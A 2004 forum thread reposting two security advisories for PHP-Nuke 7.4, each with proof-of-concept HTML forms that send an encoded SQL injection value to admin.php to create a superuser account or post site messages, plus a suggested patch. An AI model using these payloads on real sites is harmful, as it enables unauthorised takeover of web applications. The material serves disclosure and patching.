|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 46
Members: 0
Total: 46
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
exploit and patch php-nuke 7.4 |
|
Posted: Thu Oct 07, 2004 2:16 am |
|
|
Ruco |
Beginner |
|
|
Joined: Oct 07, 2004 |
Posts: 2 |
|
|
|
|
|
|
|
**************************************************************
* CODEBUG Labs
* Advisory #1
* Title: AddAdmin Bug
* Author: Pierquinto 'Mantra' Manco
* Product: PHP-Nuke 7.4
* Type: XSS
* Web: http://www.mantralab.org
*
**************************************************************
Remote Privilege Escalation
- ) Description
PHP-Nuke is a very bugged web CMS, version 7.4 has critical
XSS bug that permit attacker to gain Admin access
to the system.
The bug is very old but we can bypass the patch sending data
by POST instead of GET.
- ) Proof-of-Concept
Create a HTML file with this lines:
<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
- ) Patch
Apply this code to your admin.php file:
if ( !empty($HTTP_GET_VARS['admin']) ) {
die("Shit! Mantra wins =)");
}
if ( !empty($HTTP_POST_VARS['admin']) ) {
die("Shit! Mantra wins =)");
} |
|
|
|
|
|
|
[XSS] PHP-Nuke 7.4 Add Message Bug by Mantra |
|
Posted: Thu Oct 07, 2004 2:59 am |
|
|
Ruco |
Beginner |
|
|
Joined: Oct 07, 2004 |
Posts: 2 |
|
|
|
|
|
|
|
---------------------------------------------------------------------
6/9/2004 - [XSS] PHP-Nuke 7.4 Add Message Bug by Mantra
**************************************************************
* CODEBUG Labs
* Advisory #4
* Title: Addmsg Bug
* Author: Pierquinto 'Mantra' Manco
* Product: PHP-Nuke 7.4
* Type: XSS
* Web: http://www.mantralab.org
*
**************************************************************
Add Message Bug
- ) Description
PHP-Nuke is a very bugged web CMS, version 7.4 has critical
XSS bug that permit to an attacker to post gloabal home-page messages.
We can bypass the official php-nuke patch sending data
by POST instead of GET.
- ) Proof-of-Concept
Create a HTML file with this lines:
<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>TITLE:
<input type="text" name="add_title">
<br>
CONTENT:
<textarea name="add_content" rows=10 cols=50></textarea>
<br>
DATE:
<input type="text" name="add_mdate">
<br>
E-MAIL:
<input type="text" name="add_expire">
<br>
<input type="hidden" name="add_expire" value="0">
<br>
<input type="hidden" name="add_active" value="1">
<br>
<input type="hidden" name="add_view" value="1">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="addmsg">
</p>
<p>
<input type="submit" name="Submit" value="Post this message">
<br>
</p>
</form>
- ) Patch
Apply this code to your admin.php file:
if ( !empty($HTTP_GET_VARS['admin']) ) {
die("Shit! Mantra wins =)");
}
if ( !empty($HTTP_POST_VARS['admin']) ) {
die("Shit! Mantra wins =)");
}
-) Note
Previous patch isn't enough performant.
Try this one.
There are a lot of this problem in PHP-Nuke 7.4, my patch will check
the content of $_POST[admin] and $_GET[admin].
I'm going to post all this vulnerabilities on my site...
http://www.mantralab.org |
|
|
|
|
|
|
|
|
Posted: Thu Oct 07, 2004 1:20 pm |
|
|
Tora |
Regular user |
|
|
Joined: May 19, 2004 |
Posts: 9 |
Location: Germany |
|
|
|
|
|
|
|
_________________ Greetings from Germany
Andi aka Tora, SiteAdmin @ pragmamx.org pragmaMx developer-team |
|
|
|
Posted: Fri Oct 08, 2004 4:41 am |
|
|
hebe |
Advanced user |
|
|
Joined: Sep 04, 2004 |
Posts: 59 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Fri Oct 08, 2004 2:49 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
yeah is old |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|